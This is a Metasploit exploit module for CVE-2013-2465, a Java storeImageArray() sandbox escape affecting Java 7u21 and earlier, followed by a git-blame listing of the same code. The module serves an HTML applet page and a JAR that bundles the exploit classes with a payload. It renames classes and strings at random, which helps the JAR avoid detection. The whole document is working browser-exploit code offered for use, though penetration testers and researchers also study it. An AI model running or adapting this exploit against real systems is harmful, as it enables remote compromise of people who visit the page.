modules/exploits/multi/browser/java_storeimagearray.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking # Because there isn't click2play bypass, plus now Java Security Level High by default

  include Msf::Exploit::Remote::HttpServer::HTML

  #include Msf::Exploit::Remote::BrowserAutopwn
  #autopwn_info({ :javascript => false })

  def initialize( info = {} )
    super( update_info( info,
      'Name'          => 'Java storeImageArray() Invalid Array Indexing Vulnerability',
      'Description'   => %q{
        This module abuses an Invalid Array Indexing Vulnerability on the
        static function storeImageArray() function in order to cause a
        memory corruption and escape the Java Sandbox. The vulnerability
        affects Java version 7u21 and earlier. The module, which doesn't bypass
        click2play, has been tested successfully on Java 7u21 on Windows and
        Linux systems.
      },
      'License'       => MSF_LICENSE,
      'Author'        =>
        [
          'Unknown',  # From PacketStorm
          'sinn3r', # Metasploit
          'juan vazquez' # Metasploit
        ],
      'References'    =>
        [
          [ 'CVE', '2013-2465' ],
          [ 'OSVDB', '96269' ],
          [ 'EDB', '27526' ],
          [ 'PACKETSTORM', '122777' ],
          [ 'URL', 'http://hg.openjdk.java.net/jdk7u/jdk7u-dev/jdk/rev/2a9c79db0040' ]
        ],
      'Platform'      => %w{ java linux win },
      'Payload'       => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
      'Targets'       =>
        [
          [ 'Generic (Java Payload)',
            {
              'Arch'     => ARCH_JAVA,
              'Platform' => 'java'
            }
          ],
          [ 'Windows Universal',
            {
              'Arch'     => ARCH_X86,
              'Platform' => 'win'
            }
          ],
          [ 'Linux x86',
            {
              'Arch'     => ARCH_X86,
              'Platform' => 'linux'
            }
          ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => '2013-08-12'
      ))
  end

  def setup
    path = File.join(Msf::Config.data_directory, "exploits", "CVE-2013-2465", "Exploit.class")
    @exploit_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
    path = File.join(Msf::Config.data_directory, "exploits", "CVE-2013-2465", "Exploit$MyColorModel.class")
    @color_model_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
    path = File.join(Msf::Config.data_directory, "exploits", "CVE-2013-2465", "Exploit$MyColorSpace.class")
    @color_space_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

    @exploit_class_name = rand_text_alpha("Exploit".length)
    @color_model_class_name = rand_text_alpha("MyColorModel".length)
    @color_space_class_name = rand_text_alpha("MyColorSpace".length)

    @exploit_class.gsub!("Exploit", @exploit_class_name)
    @exploit_class.gsub!("MyColorModel", @color_model_class_name)
    @exploit_class.gsub!("MyColorSpace", @color_space_class_name)

    @color_model_class.gsub!("Exploit", @exploit_class_name)
    @color_model_class.gsub!("MyColorModel", @color_model_class_name)
    @color_model_class.gsub!("MyColorSpace", @color_space_class_name)


    @color_space_class.gsub!("Exploit", @exploit_class_name)
    @color_space_class.gsub!("MyColorModel", @color_model_class_name)
    @color_space_class.gsub!("MyColorSpace", @color_space_class_name)

    super
  end

  def on_request_uri( cli, request )
    vprint_status("Requesting: #{request.uri}")
    if request.uri !~ /\.jar$/i
      if not request.uri =~ /\/$/
        vprint_status("Sending redirect...")
        send_redirect(cli, "#{get_resource}/", '')
        return
      end

      print_status("Sending HTML...")
      send_response_html(cli, generate_html, {'Content-Type'=>'text/html'})
      return
    end

    print_status("Sending .jar file...")
    send_response(cli, generate_jar(cli), {'Content-Type'=>'application/java-archive'})

    handler( cli )
  end

  def generate_html
    jar_name = rand_text_alpha(5+rand(3))
    html = %Q|<html>
    <head>
    </head>
    <body>
    <applet archive="#{jar_name}.jar" code="#{@exploit_class_name}" width="1000" height="1000">
    </applet>
    </body>
    </html>
    |
    html = html.gsub(/^ {4}/, '')
    return html
  end

  def generate_jar(cli)

    p = regenerate_payload(cli)
    jar  = p.encoded_jar

    jar.add_file("#{@exploit_class_name}.class", @exploit_class)
    jar.add_file("#{@exploit_class_name}$#{@color_model_class_name}.class", @color_model_class)
    jar.add_file("#{@exploit_class_name}$#{@color_space_class_name}.class", @color_space_class)
    metasploit_str = rand_text_alpha("metasploit".length)
    payload_str = rand_text_alpha("payload".length)
    jar.entries.each { |entry|
      entry.name.gsub!("metasploit", metasploit_str)
      entry.name.gsub!("Payload", payload_str)
      entry.data = entry.data.gsub("metasploit", metasploit_str)
      entry.data = entry.data.gsub("Payload", payload_str)
    }
    jar.build_manifest

    return jar.pack
  end
end
Add Port for OSVDB 96277 2013-08-15 18:34:51 -05:00			`##`
use https for metaploit.com links 2017-07-24 06:26:21 -07:00			`# This module requires Metasploit: https://metasploit.com/download`
Redo the boilerplate / splat 2013-10-15 13:50:46 -05:00			`# Current source: https://github.com/rapid7/metasploit-framework`
Add Port for OSVDB 96277 2013-08-15 18:34:51 -05:00			`##`

use MetasploitModule as a class name 2016-03-08 14:02:44 +01:00			`class MetasploitModule < Msf::Exploit::Remote`
Add Port for OSVDB 96277 2013-08-15 18:34:51 -05:00			`Rank = GreatRanking # Because there isn't click2play bypass, plus now Java Security Level High by default`
Retab modules 2013-08-30 16:28:54 -05:00
Add Port for OSVDB 96277 2013-08-15 18:34:51 -05:00			`include Msf::Exploit::Remote::HttpServer::HTML`
Retab modules 2013-08-30 16:28:54 -05:00
Reduce number of modules available on BrowserAutopwn 2013-11-12 12:37:29 -06:00			`#include Msf::Exploit::Remote::BrowserAutopwn`
			`#autopwn_info({ :javascript => false })`
Retab modules 2013-08-30 16:28:54 -05:00
Add Port for OSVDB 96277 2013-08-15 18:34:51 -05:00			`def initialize( info = {} )`
			`super( update_info( info,`
			`'Name' => 'Java storeImageArray() Invalid Array Indexing Vulnerability',`
			`'Description' => %q{`
			`This module abuses an Invalid Array Indexing Vulnerability on the`
Trivial grammar and word choice fixes for modules 2013-08-19 13:24:38 -05:00			`static function storeImageArray() function in order to cause a`
			`memory corruption and escape the Java Sandbox. The vulnerability`
Add Port for OSVDB 96277 2013-08-15 18:34:51 -05:00			`affects Java version 7u21 and earlier. The module, which doesn't bypass`
			`click2play, has been tested successfully on Java 7u21 on Windows and`
			`Linux systems.`
			`},`
			`'License' => MSF_LICENSE,`
			`'Author' =>`
			`[`
			`'Unknown', # From PacketStorm`
			`'sinn3r', # Metasploit`
			`'juan vazquez' # Metasploit`
			`],`
			`'References' =>`
			`[`
Update references 2013-08-15 22:04:15 -05:00			`[ 'CVE', '2013-2465' ],`
Revert "Land #6812 , remove broken OSVDB references" 2016-07-15 12:00:31 -05:00			`[ 'OSVDB', '96269' ],`
Update references 2013-08-15 22:04:15 -05:00			`[ 'EDB', '27526' ],`
Fix current msftidy warnings about PACKETSTORM vs URL 2015-12-24 09:05:02 -08:00			`[ 'PACKETSTORM', '122777' ],`
Update references 2013-08-15 22:04:15 -05:00			`[ 'URL', 'http://hg.openjdk.java.net/jdk7u/jdk7u-dev/jdk/rev/2a9c79db0040' ]`
Add Port for OSVDB 96277 2013-08-15 18:34:51 -05:00			`],`
Prefer Ruby style for single word collections 2013-09-24 12:33:31 -05:00			`'Platform' => %w{ java linux win },`
Add Port for OSVDB 96277 2013-08-15 18:34:51 -05:00			`'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },`
			`'Targets' =>`
			`[`
			`[ 'Generic (Java Payload)',`
			`{`
			`'Arch' => ARCH_JAVA,`
			`'Platform' => 'java'`
			`}`
			`],`
			`[ 'Windows Universal',`
			`{`
			`'Arch' => ARCH_X86,`
			`'Platform' => 'win'`
			`}`
			`],`
			`[ 'Linux x86',`
			`{`
			`'Arch' => ARCH_X86,`
			`'Platform' => 'linux'`
			`}`
			`]`
			`],`
			`'DefaultTarget' => 0,`
Convert disclosure dates to iso8601 2020-10-02 17:38:06 +01:00			`'DisclosureDate' => '2013-08-12'`
Add Port for OSVDB 96277 2013-08-15 18:34:51 -05:00			`))`
			`end`
Retab modules 2013-08-30 16:28:54 -05:00
Add Port for OSVDB 96277 2013-08-15 18:34:51 -05:00			`def setup`
Find and replace 2013-09-26 20:34:48 +01:00			`path = File.join(Msf::Config.data_directory, "exploits", "CVE-2013-2465", "Exploit.class")`
Add Port for OSVDB 96277 2013-08-15 18:34:51 -05:00			`@exploit_class = File.open(path, "rb") {\|fd\| fd.read(fd.stat.size) }`
Find and replace 2013-09-26 20:34:48 +01:00			`path = File.join(Msf::Config.data_directory, "exploits", "CVE-2013-2465", "Exploit$MyColorModel.class")`
Add Port for OSVDB 96277 2013-08-15 18:34:51 -05:00			`@color_model_class = File.open(path, "rb") {\|fd\| fd.read(fd.stat.size) }`
Find and replace 2013-09-26 20:34:48 +01:00			`path = File.join(Msf::Config.data_directory, "exploits", "CVE-2013-2465", "Exploit$MyColorSpace.class")`
Add Port for OSVDB 96277 2013-08-15 18:34:51 -05:00			`@color_space_class = File.open(path, "rb") {\|fd\| fd.read(fd.stat.size) }`
Retab modules 2013-08-30 16:28:54 -05:00
Add Port for OSVDB 96277 2013-08-15 18:34:51 -05:00			`@exploit_class_name = rand_text_alpha("Exploit".length)`
			`@color_model_class_name = rand_text_alpha("MyColorModel".length)`
			`@color_space_class_name = rand_text_alpha("MyColorSpace".length)`
Retab modules 2013-08-30 16:28:54 -05:00
Add Port for OSVDB 96277 2013-08-15 18:34:51 -05:00			`@exploit_class.gsub!("Exploit", @exploit_class_name)`
			`@exploit_class.gsub!("MyColorModel", @color_model_class_name)`
			`@exploit_class.gsub!("MyColorSpace", @color_space_class_name)`
Retab modules 2013-08-30 16:28:54 -05:00
Add Port for OSVDB 96277 2013-08-15 18:34:51 -05:00			`@color_model_class.gsub!("Exploit", @exploit_class_name)`
			`@color_model_class.gsub!("MyColorModel", @color_model_class_name)`
			`@color_model_class.gsub!("MyColorSpace", @color_space_class_name)`
Retab modules 2013-08-30 16:28:54 -05:00

Add Port for OSVDB 96277 2013-08-15 18:34:51 -05:00			`@color_space_class.gsub!("Exploit", @exploit_class_name)`
			`@color_space_class.gsub!("MyColorModel", @color_model_class_name)`
			`@color_space_class.gsub!("MyColorSpace", @color_space_class_name)`
Retab modules 2013-08-30 16:28:54 -05:00
Add Port for OSVDB 96277 2013-08-15 18:34:51 -05:00			`super`
			`end`
Retab modules 2013-08-30 16:28:54 -05:00
Add Port for OSVDB 96277 2013-08-15 18:34:51 -05:00			`def on_request_uri( cli, request )`
Delete print_debug/vprint_debug 2015-04-21 11:14:03 -05:00			`vprint_status("Requesting: #{request.uri}")`
Add Port for OSVDB 96277 2013-08-15 18:34:51 -05:00			`if request.uri !~ /\.jar$/i`
			`if not request.uri =~ /\/$/`
Delete print_debug/vprint_debug 2015-04-21 11:14:03 -05:00			`vprint_status("Sending redirect...")`
Add Port for OSVDB 96277 2013-08-15 18:34:51 -05:00			`send_redirect(cli, "#{get_resource}/", '')`
			`return`
			`end`
Retab modules 2013-08-30 16:28:54 -05:00
Add Port for OSVDB 96277 2013-08-15 18:34:51 -05:00			`print_status("Sending HTML...")`
			`send_response_html(cli, generate_html, {'Content-Type'=>'text/html'})`
			`return`
			`end`
Retab modules 2013-08-30 16:28:54 -05:00
Add Port for OSVDB 96277 2013-08-15 18:34:51 -05:00			`print_status("Sending .jar file...")`
			`send_response(cli, generate_jar(cli), {'Content-Type'=>'application/java-archive'})`
Retab modules 2013-08-30 16:28:54 -05:00
Add Port for OSVDB 96277 2013-08-15 18:34:51 -05:00			`handler( cli )`
			`end`
Retab modules 2013-08-30 16:28:54 -05:00
Add Port for OSVDB 96277 2013-08-15 18:34:51 -05:00			`def generate_html`
			`jar_name = rand_text_alpha(5+rand(3))`
			`html = %Q\|<html>`
			`<head>`
			`</head>`
			`<body>`
			`<applet archive="#{jar_name}.jar" code="#{@exploit_class_name}" width="1000" height="1000">`
			`</applet>`
			`</body>`
			`</html>`
			`\|`
Make gsubs compliant with the new indentation standard 2013-12-31 11:06:53 -06:00			`html = html.gsub(/^ {4}/, '')`
Add Port for OSVDB 96277 2013-08-15 18:34:51 -05:00			`return html`
			`end`
Retab modules 2013-08-30 16:28:54 -05:00
Add Port for OSVDB 96277 2013-08-15 18:34:51 -05:00			`def generate_jar(cli)`
Retab modules 2013-08-30 16:28:54 -05:00
Add Port for OSVDB 96277 2013-08-15 18:34:51 -05:00			`p = regenerate_payload(cli)`
			`jar = p.encoded_jar`
Retab modules 2013-08-30 16:28:54 -05:00
Add Port for OSVDB 96277 2013-08-15 18:34:51 -05:00			`jar.add_file("#{@exploit_class_name}.class", @exploit_class)`
			`jar.add_file("#{@exploit_class_name}$#{@color_model_class_name}.class", @color_model_class)`
			`jar.add_file("#{@exploit_class_name}$#{@color_space_class_name}.class", @color_space_class)`
			`metasploit_str = rand_text_alpha("metasploit".length)`
			`payload_str = rand_text_alpha("payload".length)`
			`jar.entries.each { \|entry\|`
			`entry.name.gsub!("metasploit", metasploit_str)`
			`entry.name.gsub!("Payload", payload_str)`
			`entry.data = entry.data.gsub("metasploit", metasploit_str)`
			`entry.data = entry.data.gsub("Payload", payload_str)`
			`}`
			`jar.build_manifest`
Retab modules 2013-08-30 16:28:54 -05:00
Add Port for OSVDB 96277 2013-08-15 18:34:51 -05:00			`return jar.pack`
			`end`
Trivial grammar and word choice fixes for modules 2013-08-19 13:24:38 -05:00			`end`